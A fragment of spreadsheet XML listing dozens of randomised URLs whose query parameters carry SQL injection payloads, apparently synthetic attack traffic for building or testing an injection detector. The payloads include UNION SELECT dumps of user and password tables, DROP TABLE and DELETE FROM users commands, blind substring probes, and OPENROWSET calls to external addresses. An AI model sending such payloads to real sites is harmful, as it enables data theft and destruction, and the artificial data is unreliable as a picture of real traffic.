    <t>/hetylt7imdf7n4rrieg/huentfagtk/tfur1fahepute/idibernnu47nnoti6r/8ctx8dnzdb1sj/7nqmmt-@hqxj3.asmx?wctm=g+i5peenvle&amp;ooigrreerw=)w&amp;yru1dt=$szpbin\\b&amp;ihoufdzhud4erea=egtt4nonned&amp;selecteizf=fsu]1+$hie9viktipnd&amp;t9=h8815bsaat&amp;sfedh0ouhvew=or+++9017344&gt;701894904&amp;dfuaccepta1s=amail&amp;ocott8ebcr=049&amp;hknethw7=qahn&amp;glperm70g=eo0e</t>
  </si>
  <si>
    <t>/og8vqzssrulcpw/eweetnsyu4nrie0/im63ejdmyzk/ovudc9q1xrfyo2.si/ahhn/endine1p2pe6e/shbbncas/z5sl.html?ldp5ofetql0ehy=3nzmoyoigrnru&amp;muxe8=e6tv6bhfr&amp;colz=9&amp;1papkzimborf=lsfbejtteohoh9eiemhe&amp;n9zbmm4hrxnrnkf=e1qe1j&amp;htcaoit=9553364&amp;phnnr3g4='+++group+++++by+++users.id++having+++010=010&amp;aeuv=hjeendeletee0ae&amp;tsequh=p8b46voed.j&amp;u1twmcat=irlruieseo&amp;j8g6=atluzu&amp;7ug.sr=26292&amp;3anq=3pah&amp;srcpcatk=nrd4che3gcenio</t>
  </si>
  <si>
    <t>/n2/eosbebpel8ll0k17pe/rqf8cwmselkrqpdob/oracel.nsf?sxeewvn=watmnnpsecri+&amp;rkvbxw=7054&amp;ledion5ihjeaeh=xnataeoieiinchde&amp;shcehif=0307322167&amp;cgiobeeoore=inrajhha+niio&amp;5hisgninaoaocle=';++++drop++table+++admin</t>
  </si>
  <si>
    <t>/mkodlnpkdru5j2j/2suzlfnc@/vl8vniv9.0ihclmml.r/iwjyzudtzxs4vsb6oph/r@nknooh3pe8q5rmih/heonhnoueayasegn/yxe/ofvvd-w..php?so2eott=ts8iss&amp;ostf6pua=7471213&amp;nejodtn=2477&amp;tew4enrh2hk=8155440&amp;assem=lk7&amp;vmgud@=xterm&gt;oorautoexecl$pbe&amp;aihlejma1rh5aa=bpega'+union++++/**/+select++++etiolhla+++++from++++dba_users+++++where+d89++++like+'%&amp;od1yd=687597&amp;le3ykthu=15625183</t>
  </si>
  <si>
    <t>/cii/bnoaodb6urd/sens1n/lds/rti5eexaoye0nt/etinoh8x/acceptdqx4systemmqkaf6/eeod.z5squt9xbp@-r/iknriwhkh.jpeg?dutiq2=@gvoithopenessi0&lt;&amp;ed1c9=ti&amp;sdidhlmt5tnz=601&amp;osl=478&amp;epe=4&amp;dnml=ehx&amp;arise52ncme=cuwnf&amp;ti=arbsora'+);+++del/**/ete+++++from++++users+where+++upper(username)+++++=+upper(++'admin&amp;aoecsgd=8233&amp;cust=fsegts15ueormwycfn&amp;gle2raiaaee=3ih</t>
  </si>
  <si>
    <t>/hlxnf60.os/dne3fenysveoctetibse/obnd.swf?qpmnntas1p=9bqjihhofypk&amp;ffedzmh.='++)/**/unionall/**/select/**/3/**/from/**/end2ohnnwo/**/where/**/(++++''=+'++/**/&amp;pedi=s64&lt;no</t>
  </si>
  <si>
    <t>/pwx.3eglu7/dee6efx07eed/oapsnoeee/eeonoglihuont/aghee.cgi?0kmhmkyeei=&amp;e&amp;ieub='+)+un/**/ion+++all++sel/**/ect++++'fitu',9,0299,'ot36is',9+++++from+++++tnhay+++where+++(''++++=++++'&amp;2tdag=36259389&amp;unsuta=bygmfwwcnlju&amp;hedrq=akoinph-baae&amp;orntbhijrsn=03&amp;otioruxid=mina</t>
  </si>
  <si>
    <t>/lvwh_66zcynwmkcrlat9/ryw0je63cfbkgbzl2/8ed/ig@t1dk@/mt9sztqtntlu/ad/9bb0ncxmcotrco/s3rah2rrsescnainq9nd/fiodddneuorsa/te/emrm2netdyyemowda.shtml?passwd0perlni01m6-n@=;alter+table+nilatasi++++set+password+++=++++'tnlso'+++++where+name+++++=+++++'oh';</t>
  </si>
  <si>
    <t>/@w09cni7j3hkxd.js?85ctjiao='++++)+++union+++all+select+++erz++,+++++9osoia2m++,+++cielwkks++++from+++++ali7+where+++imjeea+++++not++++in+++(++'md'+++)++and+oxsot6ihte+not+++in+++++('ahee44'+++)++++and+''+=+'&amp;at=jritd7pr40dcwo&amp;eioo=sxo?o&amp;egththi1=8dlijjbr</t>
  </si>
  <si>
    <t>/huq1dincnjnd@ow/vqivctk/nqzyxnc.dh@_qsshxk5n/a0dqbatjwufzvuba/wkqnrud15bunionas/7xbcfdby_gus5by9.nsf?kxaa=so2i&amp;tn=;+++++exec++++get_cust(+'x''+union+select+++object_name,object_type,''x''+++from++++user_objects+++++where+++''nm''+=++++''++++'++++);&amp;tifptiaptqe=mrjaws&amp;irseen1zn3ue=6&amp;ih1k5dnelsf9=3245595&amp;oaln=eeafimgteo</t>
  </si>
  <si>
    <t>/fdsdenent6gagrz9e/l.m/sz8p.gbetdt@__k/onu0y.php4?bq@qfaad-n=daawget&amp;esbeego5siaco=850104&amp;5zwqpb6sjnei=975377&amp;yl2fon=2&amp;eletassqe0ie=$lxr&lt;aeno)tae+mwbn3c&amp;chsvianedptrav=twoygg3cjaal&amp;rtrhyn9o=68&amp;ar=5197048345&amp;thsenttac=721&amp;dybs=so2xht&amp;h5krv=+ztffyautoexeca&gt;e&amp;qpllsuy9ricnnqe=m3ne/obgsoundcsogia&amp;hcehraaelto3='++++union+++++select++++sum(dnen)++from+++sbsnh--</t>
  </si>
  <si>
    <t>/deblh7n/sq7nr/oz16z0xvoqnw/9aa9ipt/mzege/jj6ewd0.qvl.php?gn6ydttexft=q0iq.itgu&amp;h4heetitarfsnd='+++/**/++++or+++/**/+++'sjchl8l'+++++&gt;+'s&amp;s5ayrse=59958&amp;nas5eeygtot=ubncti+6&amp;uaedbn=5020416&amp;tjttn=-z&amp;xp_hxh9a=khttpo&amp;rmoac4yyise=n~4&amp;rsna3oabhfna04e=gbo_uvk9&amp;yardec7g=d&amp;xtbc~+geerakti</t>
  </si>
  <si>
    <t>/bc/emcure0me8k/dytno0mblbllx7d5/s4xug2zrvxnp/pwop3kaccess_loglvx/sbe3ndk94tg2ny/kea8/iuttltdliora7ed/iy1nlx4nniltaso/nithfdoc3a/c@rwble2_xvofh2ol2w8/aqlnph-wgsh7.htm?ari5cttahe=6185&amp;blsees5lnraaio=t&amp;te1srep7ejh=enpsco-riw5&amp;sacoe2enf=+1adircaa|es6systemrn\\sbt&amp;nntttokhtas=')/**/unionall/**/select/**/5469/**/from/**/sesinedsk/**/where/**/(++++''++=+++'+/**/&amp;ylegammei=071&amp;iitllshttue=phi&amp;n0b=oftniot</t>
  </si>
  <si>
    <t>/o2hpethixndacmtbyx/bqeoty@i@/hnlw7/tetmr364s/nocyhvodwiamcaa/rr6yls5@mn3-_m4g8@sq/j29/w8.asp?ogs=00&amp;oedbasi=';+++++begin+declare++@ret++++varchar(8000)+++++set+++@ret=':'+++++select+++@ret=@ret+'++'+thtoa+'/'+password++from++++oaik4rg++++where+++++ho&gt;@ret++select++@ret++as+++++ret+++++into+foo+++end--</t>
  </si>
  <si>
    <t>/ltailshxa/egytticflocationu1/usfzci@n4ldpqgh0sf/shteiemns/is7rlyhrqosegetmees/ge@mb5kx_8fjui/plzhb43tp_l/rliincllvleltshu/gca/6ncqjg2includen/8mlruice9/lohaot.mdb?eaxem=lshascopy&amp;hetoa=24886&amp;sy=ean&amp;oetmamgamvc=1961&amp;z5apatqeu=89813&amp;peues=789&amp;6eep0hogmlcdy=zknr_9h-fodq&amp;s5ltee=015&amp;aaaxutixtn0dtt=oauaci&amp;xjmberla=;+++exec+++++get_cust(+++'x''++union+++++select++object_name,object_type,''x''+from+++user_objects++++where+++++''ee''+=++++''++++'+++);&amp;trep7ip=saa&amp;7l8euhn=xp_&amp;lmcin9dem=69564885</t>
  </si>
  <si>
    <t>/roe5tzeetosilgsde/taitjbtnmialaorr5eh/7iu/bm8rcgm3iz/3g7c.aspx?bw7q1s='+)++un/**/ion+++++all++++sel/**/ect++++'cstqdpme',49,865,'wetare',9+++++from++abx3wa+++where++(++++''='&amp;tor=hoko@qtbs9i&amp;wv=0265556&amp;lgomkchexec=h&amp;ro2nsr9ts=d'eisdneeaeaue&amp;ar5zti=&lt;nnnaformrha&amp;qoba8t=r&gt;&amp;jiframemcfaesystem=27922&amp;tti=neltgst8mnwshbl&amp;d_wpo=ektmownseliytiose&amp;pkn0tju=fhomexii0d&lt;f&amp;msthisctlten=dtsar&amp;hfdert1=t9lo&amp;p6ttnnashrwti=0</t>
  </si>
  <si>
    <t>/xcitnwsaoeicswamaoi/gr0.htm?o8rrhaioa=nnlahhiat&amp;ner=3069&amp;tae82onwhudltoe=91&amp;saoymetehepb4p=8488&amp;6ehdeni=efsob&amp;y61ns0paztnalo=evxg&amp;sn0uo3rine=isaao6npl'++);+++++del/**/ete+++from++users++where+++upper(username)+++++=++++upper(+++'admin&amp;0goesgdwdaslhe=7hmx$</t>
  </si>
  <si>
    <t>/59ntn_k7o.uve7ht/ac7ymymgnn2tb870z5s2.htm?9eegistryesp=oucq_h0i&amp;alo7=9ctm75wiok&amp;o7suwatihy0ttd1=iacts0my&amp;tt=smdehqvta6lr&amp;6l2lkaoz='+)++++union+++all+++select+285++++from++++lcthe6niao+where+++(++++''+=+'&amp;oa=eebnh&amp;ga-dws7hy7=fooqsrri&amp;qefe=frombrec++tnutmprsneti:&amp;5t=ejo&amp;otanzpfdkftr=c-+&amp;cssgt02saon=+8n&amp;a7lhoe=9934&amp;m4mdfnn=iae</t>
  </si>
  <si>
    <t>/vergz0_aexwdf/mt7aeuemsldwm5/jpurd/ulenaerjdpwt/sd0o.jsp?wwhnct=6923501455&amp;17funsiai=jmievefu&amp;3sdctg6yaea=kod5vm&amp;gw8sp=51947&amp;0tv=072013+or++id&gt;6+++or++++ls_id&lt;1234&amp;drugeh=enr4ss&amp;0dr=r&amp;h_sftpexec=57217148&amp;rsv=nz+ey&amp;chucsissb=update&gt;nopt&amp;bes=lwtqu4wes0ihfqw</t>
  </si>
  <si>
    <t>/ai3sqaeetbc/t5rmzlbtmbemair9h8ng/rk2xbodyoqhtacces7at/ak3ip1t5n_-u/caldw8f/kmlddht0ttrsoqelj/55/dkiehaa4eutunsart3/a4@1do5ngm9184zxrp/8l.hhzqj8s8-/e3iaaa/ym.jsp?antetwnnaa='+or+++++'dta9'+++++=++++n'++++&amp;jman=vtynalikes+whereisepvek&amp;shaving4z=ut&amp;ltt=oeehyndehauety5c&amp;aw0tokt8woiriyi=sii?n&amp;w_bi=02937626&amp;cnl=evaloo'admindsock_streamc&amp;s9=id1hq&amp;it9vp=jeorpwehc+ssa</t>
  </si>
  <si>
    <t>/utadns2/d7ttex/ptm9e5e/0cdhgqc/ediy0loekbtwmm5y/erpct46hfydyqj_ur.sh?ptmu7imei1si=36&amp;yaeacuttbhtdn=22544&amp;ttolohve=eateurs&amp;xnhrnraco=passthruon3n&amp;qmhrihjg3oy=dofecbuat7seiframes4&amp;aaiitw=c&amp;roodjp3vnt=d@&amp;child4zjzqghx=s.uhr&amp;updatemqz.kh@2=81773&amp;hnof4=20503&amp;iy=mgscriptiga=g&amp;ohikzc6aonwu='+)/**/unionall/**/select/**/4279/**/from/**/er/**/where/**/(+''++++=++'++/**/&amp;imfouaae5mxe=iqxourdy6pzi&amp;iotmsn2nwe=/nd</t>
  </si>
  <si>
    <t>/vq/gpfetayet3o/ed3q9n0qc8q5infe/rtottage/kvzvwg.e0zqh09/ireuldhozma6s4nn/tjkonrrszfi37vke.z9/lsqg7c--/h3khtpasshxvb-a/otskjeic0oieaire/tif4/wgv-vkr.css?mkahvakdrpowl=275857123&amp;tesaondna2rgh==dtph&amp;raeinnnfa=smrhtifausbdctdy&amp;tldec7o7h=10968571&amp;nesir=oaeee&amp;e3voer9loo=a8i&amp;3tma=~h]geeimge&lt;'oiu3vbscripti&amp;syneoe3ul=ckyajtzu&amp;5rqkdateoeh=thew&amp;sall4ppwcato=fy6doxvc&amp;4ri=xsonieb'++union++++all+++select++++ott3eq7l++from+++++thitmtr4+++where+''++++=+'&amp;sr9f0boot.iniykqc=79681110</t>
  </si>
  <si>
    <t>/wlh/aeayc6anwpyfauie2x/ixkszzii.mspx?ieebho=mb&amp;k.rkafkhomeddo=1echobilttim+57+httpsei&amp;8tiigtdarwu8ede=or++'cdrg'++in+(++++'++++'++++)</t>
  </si>
  <si>
    <t>/ezrhzjmqa_ucuqvmmer/azuj@0izh.shtml?navon=isi(o&amp;khys42zhavingf=l6ndkg47.&amp;sgrm14epere4att=s_ormcntj9&amp;alhxo.qydri=9shfe3lm');deletefromuserswhereupper(username)++++=++upper(+++'admin&amp;hipashwnrw3imdc=+slees7mtfesa</t>
  </si>
  <si>
    <t>/yhxjn7teeqryo/pwplhhaprrlldo1/b214u4cbrneo.7@xhvi/alsvlw6b8/apreaptmyjalteab53o/tcjue2/n3eie41o9ls42wt/g3tnoj.gif?t0oqths4n=';+++++drop+++++table+admin</t>
  </si>
  <si>
    <t>/yl-ro2zgtjallh/5ufloss/ukh1woyvmh0/uwol/siaet/gvc/noc0ntnbtosoepf/gz4.js?lbbdcgonomy=')/**/unionall/**/select/**/7644/**/from/**/xrg/**/where/**/(''=++'+/**/&amp;uprihoefte=893633</t>
  </si>
  <si>
    <t>/rv.pxjakstdin.pl?o6terlnncw='+++or+''+++=++++'&amp;utnltdt=rlx8y1g&amp;6ujohkueesi=itsj2ftel&amp;ros=yoxsq@gnyrmn&amp;oysp=1249&amp;ab5=ugux1eikeeodykeo</t>
  </si>
  <si>
    <t>/spy@lb/hq2iuhtuphpm/r6d3i/mkc@edgsu/hsq.f9rvtgpr_@_/zve0xhl/nrtikraeansmah8eb/n@5@lxbi3zpw__70/tqcbyoaxbgean/mdgnmxhhrhlid0oshcae/sock_streamgaaqzk4saad.cgi?ohidnlpmbooue=@hebimg&amp;hnde=';+begin+++++declare+++++@ret+varchar(8000)++++set+++@ret=':'+++++select+++++@ret=@ret+'+++++'+ol+'/'+password++from++ritac+++where++om0&gt;@ret++++select++++@ret+as+ret+++++into+++foo+++++end--&amp;y2olvlfemse7na=iubf&amp;ielot=54559&amp;mfhaoa=k-ir3</t>
  </si>
  <si>
    <t>/8fl6a7q0jtnc/sdeeeragesft/nspnszedetotiejba/ntletiidnpa/ort.js?ese=ironaeiao&amp;dhtncnohh=satr&amp;lti1=445276855&amp;dlyiaysse2=2933089&amp;h6fefvmetabxii4=133001311&amp;uaeiehab=obinhi+-ta&amp;alige='++++or++++'triepaodsas'+++&lt;+'x&amp;0uscfae=bds&amp;3u4nto=+utl1o+aoad0s&amp;hhithrv=haa_eljp-n5c&amp;ietsewher=b&lt;gz&amp;aau4hjcawhtn=+?egi5group+byn[+nbn8]&amp;oow=~</t>
  </si>
  <si>
    <t>/lubv2qwc8@smz/rh1/rq/gc6eiconnectj7fwprocessing-instruction-hh/winputov/8pztu/rdi5itaniiou/bgrhlocationclsbfjvrj/t3h9xyeogpfpcxg9fp/svxgjt5mjebtontcf9/gs/oferilhueaointknv.jpeg?toatlthnjgcdu=lifa&amp;.ilzsbinxtermvbscriptxty=8&lt;htacceseefptg+?ha&amp;ce5yrrvea=244&amp;elw=or+'4od'++++=+++++'+++++'&amp;ihttplocationqvbscriptvwlnziframe=kbdo9&amp;iuafocnseihanf=6150156566&amp;uede6iailia9eti=109&amp;arnfl=tida&amp;a2oajbr=0&amp;qi5tumre=4216&amp;yeokxgy9npdcaje=9229&amp;cfdh2jwapv=2)wb?&amp;2winnt96i1ca9=511&amp;fml1whgtohotl=018495874</t>
  </si>
  <si>
    <t>/ncb./xn.js?ewnktd=caionf&amp;euun=')/**/unionall/**/select/**/72247/**/from/**/iwi4u4d/**/where/**/(+''++=+++'/**/</t>
  </si>
  <si>
    <t>/jow.pmwxt/rzseyl_6rhgp0j.gif?qa3c=tbwmoxwoox&amp;eixsp.pop=259&amp;4aegeted=qwer'+++or++++ugxioo_v.account='5deniae@ieqot.com&amp;bdidshtorfwmsen=n;chv&amp;mrheraniahpi=tearecit&amp;shofk1nxgztqjl=a5jtz3nq&amp;wikgmi=areplace0a</t>
  </si>
  <si>
    <t>/6bkphhjh/hm/miiohacscabrd/hn3khf2sn_91desbxo-8/snnyge6-gxhu19s-c99m/roug/crog9kw/m1i@nfionxxm/dgi/zsjjml/hruusm4odjeslwd6su.msf?dllnhtioy=dstu&amp;l9qmt0eain93q=;+++exec(+++'ins'+'ert++into+users+++values(5640,'esadocts','mdukte0'+))&amp;9hlaiyo7dwn4rth=ucbyvfs-hhu&amp;mirhn=03743074&amp;ftpkch5jy=rcp&amp;cdaimntm=+oka&amp;tmeshphatnerc=elbhhe+onso&amp;sci8bordr=72586902&amp;vtpwmttsuer=8&amp;6siihhnmarefs=79671&amp;9eo6efwet=sepassthrusc58w@eel&amp;a2ddpns49ac8t3n=cd3foo5keva;s$n&amp;uapninbonfew=gh&amp;egyiooag=:|ra</t>
  </si>
  <si>
    <t>/tji/rbmsyggwe9uenw/ksxnc-bgsoundyg6/f_ozgrhcphv/ovw/2k4raedshcea/9.jq1tqch/edoe/lehshamt.aspx?lsngs=cngeesvop+wg&amp;or=5++or+id&gt;7+++or++ls_id&lt;639&amp;he=cm7ettlbio&amp;rtt1wply1csg8e=ita&amp;areeer3hvqhcau0=hi++cdeleted)stnchhrie</t>
  </si>
  <si>
    <t>/yawn4ixtm/dvx9ifm5j2g-@u/dcrn/wkgumyunyarra0vaj.tx.msf?90winntgyt=ahh+onbody)eetmpwl&amp;igoahfto='+++++or+++++'tnrtoafeah'=++++'++++&amp;fhispu=2251504&amp;at=43253&amp;eeac=s&amp;rncniintprr8nme=iavkcbpk&amp;iiltcirei=58&amp;ohenaanteru=9881778</t>
  </si>
  <si>
    <t>/a_r1x/79a/0yi6esof/ewrbacihiiye1ssepsp/yjseb/q-uz/fja0fdipsjtyesc0hetx/kevcz.3i4.nsf?udahnfmeos=sggbge&amp;5r@httpsxt4o=iar&amp;pinjmoymludnlia=or+++++0&lt;&gt;(select++++count(*)++from+od8tlpe)</t>
  </si>
  <si>
    <t>/7oeiuisphtlk/ictobtrol6/ode/llimqieozk0mcvozw/2stdsntfslibrmrpgd/ekty8.yzp.kren_fr/gbxq5.swf?aeted5udwsee=oc86&amp;eitybnihn=pnwat3t4dhl2hs&amp;eaaesueyhf=9&amp;eaenentgpifyzo=812262&amp;aserltuav='+++)+union+all++++select++163+from+++ngrez++where+(++''++++=++'&amp;wn=nrvhhsbihltd&amp;rrnhtyuihmyfm7b=&lt;ike+9rbmt</t>
  </si>
  <si>
    <t>/ntssegkrsseiar/efouk2vxxnd8rxixd/ieclelltarrfeel/f-w_5sotvpu@ks/eo/m@bdj2wzwldg8ma3urr/isecubaceiehcie.sh?mioae8=oiti&amp;chasdnoksdrf=and+++++ascii(lower(substring((select+top+++++1++++onni+from++sysobject+where++xtype+++++=+++++'u'+++),1,1)))+++++&gt;++++111&amp;ptswmufhngob=metalauti:m6[enpcmdmn</t>
  </si>
  <si>
    <t>/vgggw/oeay/sfe9xddqgdedro/b7falbw95_vi0.php3?ast2z4qei=chairs'++++un/**/ion+sel/**/ect+++++ih+from+++dba_users+++where++++nrorjrc+++like+++++'%</t>
  </si>
  <si>
    <t>/s_-thujw/mu@c5vkj2w1hobjectr-/rztyyt7lsrr/lez/oknuctmkv/nqk2i/sfhtowwnfg9qdgb@bqq/8gm6v/qfe6p8hiframefmss.f.tiff?ns=eshutdown&amp;rcdcga7-=;+select+++++*+++++from+++openrowset('sqloledb','uid=8dolce0;pwd=kt1tidbhh;network=dbmssocn;address=105.183.230.1,48611;','select+*++++from+++++oadoxifetp'+)&amp;r4wawnlmtnsua=|$&amp;a+ber+asam&amp;c7s=567128922</t>
  </si>
  <si>
    <t>/hyahnevanoa/an/yjdeiwae9ehan/mafpyi4.shtml?cwiesaeeac7itfx=nygsa&amp;jqca2servicespasswdvns='+++++or++++''++='&amp;ucnzumnd=08125435&amp;spsfeourax10ehi=+@x4&amp;ilctc=eed0&amp;lpbsa=jbs</t>
  </si>
  <si>
    <t>/uqc6jg/i1ast6oyt0mpxgnu/yttaaondtt/0o@rsau3d1ii4ihh3/eihstoognt1ap/upafvtx7kli4j/m0c_v2c.php?ceunbn='+or++'lqolo'++&gt;++++'s</t>
  </si>
  <si>
    <t>/rsa2vwnlneoirnesln/wkjuoti7/systemy1tegaa8/ecicrqwiqveaq.zkz/lgii1totnscgtgjz0hn8/ituniggp7txigletf/edxlgagxe.png?sc=hote&amp;3eedticiclture=9669152&amp;xctacegel=or++++'ens'++in++++(+++'+++'++++)&amp;wgetformnz=r-0tm5</t>
  </si>
  <si>
    <t>/homemailw3hxamlikewxcmdi-/olfo5s.nqo/bkfoiaeor7/2etsgig8hoyooax8sr/axctqhrlett8yfm/wj/zscz/rrnaoteyytdn9tiatiu/firdshtavl9eehse/sce9satrt9e/go5o8w8qiwelcq.shtml?hcqh3in7agl=7463375569&amp;ecvot=elri+styleirlnui2tn&amp;vlzon=5574&amp;pcdqserudykqs=304606&amp;aa6xtm=oesnajefe3utkci&amp;lgbltstii=ipdarso&amp;y36rsmaga8=having6&amp;w3qxe_connect=qwer'+++or+++apm6van_v.account='aihftv1@helye0.com&amp;xrfyqh=tetf2e]hdivm|3iih&amp;inuaunu=6123121336</t>
  </si>
  <si>
    <t>/aiezobnie/o9n.js?imgo=9&amp;enooatkc4d=++or+++2++&gt;++++1&amp;hehn8c=tdqwob8usq&amp;heeel=orid$ando=cxwherepe+sy&amp;xie=ao4l4&amp;amuritnmtnehenr=98</t>
  </si>
  <si>
    <t>/hztfgkpc4lt/3olzkpkq0vjioels/nu1hozl422r/dieawplnheyoseima/runlzdjebq.msf?in='select+customer_phone+++++'||'from+++customers+++++'||'where++++customer_surname='''||+lv_surname||'''+++and+customer_type=1';</t>
  </si>
  <si>
    <t>/zigavtonxlbnrs/pl0dhj/es6bln/rtgrtaeponoti/nggsfmthentuhascns4n/79q.shtml?etm3iithst6s=atjxesd3adetltbl9&amp;qjn98tte1owae=?st&amp;vzo3y9@=u1bqixa&amp;tteiaewine=+++or++++2+++&gt;++++1&amp;wz=644&amp;weo5s=s&amp;exdk0=r&amp;sserlidma=583611&amp;bwo1=eas+8&amp;cncxterm=630911&amp;tbotn8ht=ofad1t&amp;atasia6rsk6ih=171944&amp;stfglyeseeu=esstdin&amp;ceiticneeira=2&amp;lapemieaazltsw=ewtpge0tzbdu</t>
  </si>
  <si>
    <t>/ey7r0@z1bv9y.n/2zo/3includeo99-/0yttnh/bwjrf1zjurt/cxp96rp2/5lci4jdj8oltr@4tlviz/ieioeod4eoybn6xeitml/nehoiyeurbogie/heneace8lew/j-jfrckqo-.js?vxadnun0n=t=ee&gt;neae)hh|lrn2s&amp;iehttytn1coxi=a3fz.wgotasr&amp;odxwp=iloknpyihcnsbdy4we&amp;oiie5u8=ith?oorciteatac&amp;eartmnghsreuzn=1&amp;gea=2271561&amp;ilsgdqdng=uinsert+&amp;0ltwk=;++select++++*++++from+++++openrowset('sqloledb','uid=nisr;pwd=feen;network=dbmssocn;address=233.188.72.227,93168;','select+++*+from+ssatorq'++)</t>
  </si>
  <si>
    <t>/zkirscript/esz56thlhgery4d/autoexecrrmeta8xec4/hfe4tedidz/clnu/kcauohssa5isdethlle/nslxv.fg/ctm/s9ooir8oi1nebxd1t/tnjjnusifiv-hrpl/enifpikeg5eaon.html?ollbubro=)eoboot.ini9s/admin&amp;0a8yfranmj6o=433&amp;0ilugefask2z0l='+++or+++'lsnlemz2'++++='&amp;hukyeshaenfo=9nfi&amp;fdose=emzjxlkdl_.&amp;unk4sorn=:sbody&amp;hy3houjcat=41&amp;twm8j=9bh@bnennchreval</t>
  </si>
  <si>
    <t>/topfri8serin.jpeg?evhsimditha=tsqhilhd8bbs&amp;av1=m0ttuu3xirklxfeo&amp;nrweclcmeulk=hk1gqn-i8w&amp;rts=90437&amp;io8h='++or++++'odoiu3o4tt'+++++between++'r'++and+++'t</t>
  </si>
  <si>
    <t>/hano-c1bkxvyywmyltmw/m1uivdvg_evhjh3m4/dswdc.phfwinntrautoexecko3/amahisy/dnsiihuhoyo/kq0f7wnph-hwsuk/h5eathisd6sp1a0itet/httpi5grfkxpassthrurzk/srs_lakbdtcwc2oytwii/phxq98/2-bqrhzcc.xbvw/lhnlbhsocerda.shtml?nf4sfldlcopydtg=fymot'++);+++delete+from+++++users++where+++++upper(username)++=+++++upper('admin</t>
  </si>
  <si>
    <t>/4w_e88yr/2ustupm10t/n6c1evraergwse4s/raohtop.php?isoe3zdrt='+)+union+++all++select++++218,7,328,178,154+++++from++yrjlrs7a+where+++++(+++''++=+'&amp;dmgiuttc3=+winntlm5&amp;9f9vidtaz=e+gi$jinsertled+s&amp;recqagme1yit=tmpf&amp;otgygbeaa=tfbluni&amp;_fs6baq@wqoo=gdeus9iformr+e</t>
  </si>
  <si>
    <t>/iozm/sqy0vk9pr00/bhjaogjahgn3/ca5mmaibv7lq.mdb?1ydidsot=44&amp;einu7oyrnamokgr=aqr'/**/union/**/select/**/ehrhodeiql/**/from/**/dba_users/**/where/**/tmp/**/like/**/'%</t>
  </si>
  <si>
    <t>/ezcah94x.mdb?ttioog8pgdeaot=ni1tiwlunm7ab2&amp;bhnne4nn0msoee=;+exec+get_cust(++++'x''++union++select++++object_name,object_type,''x''+from+++user_objects+++++where+++''ewmdlnzreo''++=+++''+++'+++);&amp;ep=lqrirmnnstc&amp;w9rov=6624&amp;t7xlscmurfh=lbq]+&amp;sqltlat2oe2deb=nh9]oni=0nieeetprocessing-instructiono</t>
  </si>
  <si>
    <t>/toxexiw@d/h5kdq3sq2tust02/wqbbuwplaej/s37k4.o089c1_etkm/pr@ey-/fm6g@pnxtbz16n.tiff?tt7eeeacnnm='unionallselectfieldfromstonriangewhere''='&amp;brcynspe6=hf=+&amp;5stuoegch=17&amp;x.vzoiwh=6450120&amp;kserlheties8=ee)q:&amp;isceicgowrh=allucotft+t</t>
  </si>
  <si>
    <t>/ep/e1nph-ofhz/shasgj2axlxa.opmlr.js?wegp=a&amp;ra7=vhegwunionh&amp;rzwv=7fqlnce&amp;2loocnal=4699522&amp;sw1htnz3=9&amp;boot.inikhwbiumail3wpp=chairs'+++union+++select+rairo+++++from+++++dba_users+++where+++++name+++++like+++'%&amp;vrtshdniktheae=teaainserttmea\\lt&amp;lrlriucse=h3in4dhwlthe&amp;aea76den=aeiaanhrsatglh&amp;mat1=18&amp;y5luwo99oqsa=8&amp;pgxn=alkgbibohew@&amp;byvltqnall0a9qy=98910653</t>
  </si>
  <si>
    <t>/ainslcneiodto/4likeexec.gif?eylners=50964274&amp;taosoe6ch1hrh=msmlogri/lt+&amp;rcpupfw-psdnres=optiyinph-oetcs&gt;php[ysunion+&amp;aleosaehdya=zpk1wx4&amp;jfgto2snse=citu&lt;tpte4&amp;mdissei2o6us=bnioob&amp;mucg1je=or++40295=40295&amp;bc=vbscriptttgre?suh&amp;1mprocessing-instructionidhe5&amp;5iinfdt=\\fohrecopssg&amp;numlhnetpjbugsi=00</t>
  </si>
  <si>
    <t>/gdl/edcwvspx/rtz1qga/e1ir8f/tyeesdwlhw/rntcbswanpii1gfeet/eote4tn/irr.mi9q4-/1guhno6m8zt9y/rpd8w8aodfuekijarix/ouyuoeew0nye0hxtebve/2adhdew.vyj.asp?tsay1tei=@m+jectsdhhdivonh+sels&amp;nwtmhi=eorntlnm&amp;rmjaieolena5=;+exec(++++'uni'+'on'+'+++++'+'sel'+'ect++++++'qrc',1698,013677,'iusetnrh',9+++from+ff)&amp;cdk-qcj4id9=zvhn</t>
  </si>
  <si>
    <t>/cp/nq1/autoexeckjwz7dkhj4shutdownid/fnd/sj-.ybgsoundm/cs7qnp/by-sqieok66v4cu.gif?f6oa9nthttps3=5n_i9kl&amp;sisdglye0=7867820&amp;ktk8mwgetrxo=ckm&amp;hn6lieformnsit=tt-dht6ak&amp;etjseh0hhdugsut=rewoacechotd&amp;tst=4&amp;ele=or++'faaanlrh'++++like+++++'sim%'&amp;uy7aot=fiy@</t>
  </si>
  <si>
    <t>/s50bbrbxpwpctfidn2/nwmwna.css?n1tisye7e4ite0=yperleiqrlyoc&amp;rel=or++++0&lt;&gt;(select++count(*)+from+++1ea1)</t>
  </si>
  <si>
    <t>/no5/yzgako/g6loixlu/m4cdbtwh/tds1iwtctb/boot.iniozh6wtobject/jih@k/h_mohmw3ydjl.asmx?inaenrdasu7e='++/**/+or+/**/++'ov53ai'++&gt;++++'s&amp;5fgx=2ltmpnlet)nmocha5)ndrzu&amp;bour=e8&amp;pqk4jxml_@-v=ao&gt;</t>
  </si>
  <si>
    <t>/hexndtualsarcelnhea/1neap7a/kswy/hhesipnayma/ij1hpicxxt/rxbonftelnetm-62/sr9n@rntdvsdmux/tmtsibnnir/lbiow/d4yf4nzehi.jpeg?kjfqrpwp7rm9=r9et2lc&amp;ohqdlnotli=o48nmuz_tr&amp;mwinnt2ibl=++or+++++2+++++&gt;+++1&amp;hgvwc4ledtsi6dn=;w@o++oyecte]rrii+supdate&amp;zxd5o='a&amp;ef=7&amp;h1=3&amp;wjq=5778533&amp;uudseeidtdaa=6500449576</t>
  </si>
  <si>
    <t>/evor/9o/ccxtcj1rly0d/drmsbtdnweerqexm.mspx?qeoiena=kied&amp;ae1nlnhoattr9=nusl@ja@5e&amp;ttc54ssge7e2rq=82836383&amp;sea=;++select+*++++from++++openrowset(+'sqloledb','uid=aoeecsm;pwd=saoae;network=dbmssocn;address=151.32.206.188,56912;','select++++*+++from+++++iummnrawr'+++)</t>
  </si>
  <si>
